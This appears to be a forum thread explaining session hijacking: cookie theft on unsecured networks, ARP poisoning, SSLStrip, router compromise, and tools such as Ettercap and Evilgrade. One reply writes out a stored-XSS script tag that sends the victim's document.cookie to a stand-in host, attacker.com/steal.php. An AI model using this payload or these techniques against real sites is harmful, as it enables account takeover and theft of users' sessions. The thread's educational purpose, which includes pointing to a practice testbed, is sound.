session hijacking and cookies

Resend

in session hijacking are the cookies unencrypted if the connection to router is encrypted? also if one steals the cookie does the original person still have to be logged in before the hijacker can log in? And where does the hijacker use the stolen cookie to log in?

does hijacker have to be on same lan? In an internet cafe everyone is on the same lan? I am interested in network security hence these questions

Pygmalion

Resend wrote: »

in session hijacking are the cookies unencrypted if the connection to router is encrypted?

Yes, unless the user is connecting to the site securely; sites such as Paypal will only accept secure connections, sites like Facebook and Twitter have the option of enforcing it.

also if one steals the cookie does the original person still have to be logged in before the hijacker can log in?

Yeah, generally once the user logs out their cookies are useless.

And where does the hijacker use the stolen cookie to log in?

The browser stores it and sends it each time it wants to get a page (until the session ends, by logging out or closing the browser).
There are plenty of extenstions and stuff for browsers that let you set/change them, generally when you steal one you'd use one of these.

does hijacker have to be on same lan?

You need to be able to capture the information they send.
Generally (almost always) this occurs when two people are on the same unsecured wireless network.

In an internet cafe everyone is on the same lan?

Yes but generally wired networks aren't as vulnerable.
It's possible someone could steal traffic by taking over the router or through something like ARP Poisoning, but this would be rare, and generally internet cafés would be aware of these risks and take precautions.

If I got anything wrong or left anything out I'm sure someone will jump in and reprimand correct me :P

Resend

Thanks

Pygmalion wrote: »

The browser stores it and sends it each time it wants to get a page (until the session ends, by logging out or closing the browser).
There are plenty of extenstions and stuff for browsers that let you set/change them, generally when you steal one you'd use one of these.

i do not understand this part.Imagine:-
Insecure lan
A is logged in to anysite.com
B steals his cookie
where does B enter the cookie when browsing to anysite.com to be able to impersonate A

If I got anything wrong or left anything out I'm sure someone will jump in and reprimand correct me :P

i would say you won't have long to wait:D

BaconZombie

OP, have a read of this first:

http://cscis12.dce.harvard.edu/lecture_notes/2009/20090721/handout.html

The section on Cookies starts on slide 34.

JimmyCrackCorn

SSL:

As an addition SSL is not guaranteed to be safe.

Man in the middle attacks do work on SSL. There are tools that strip certificates.

Also accepting a bad certificate or regestering a bad certificate voids SSLs protection.

I'm currently playing with a piece of code to hook winsock functions including Calls used to send and receive Data using ssl making it ineffective. (I'm messing with rootkits and other stuff )


So what I'm saying is there's more than one way to skin a cat.


Do I have to be on the local network?

No Scenario 1

I compromised your router a month ago and have it pointing at my evil DNS server. I can re-direct your traffic wherever I want.

Scenario 2:

Iv compromised your PC and have remote access. Your screwed.



So it can get complicated quickly but as you can see no simple answers.

dlofnep

SSLStrip is used for SSL connections. I wrote a small paper demonstrating it with an ARP MITM attack.

As for hijacking - you don't have to be on the same lan. It can be accomplished a number of ways. One is through XSS, where a script on a remote server is executed, with a parameter passed with the value of document.cookie().

An example might look as follows.

Attacker inserts stored XSS, which silently executes the following when unbeknownst to the victim, loads the page.

<script>new Image().src="http://attacker.com/steal.php?value="+encodeURI(document.cookie);</script>

On the attacker's side, they will need a script that reads the passed value, and then store it to either a flat-file, or database.

If you download mutillidae (a web-hacking testbed), you can practice on that.

Phractal

Over a LAN probably the single most amazing tool I have used is Evilgrade. Takes f*cking AGES to make it work, but once it does work, you can have most any box pwned in moments thanks to basic social engineering and insecure update mechanisms.

As for MITM, cookie stealing is a big enough threat, but simply sitting there and MITM-ing you is FAR easier with Ettercap and SslStrip...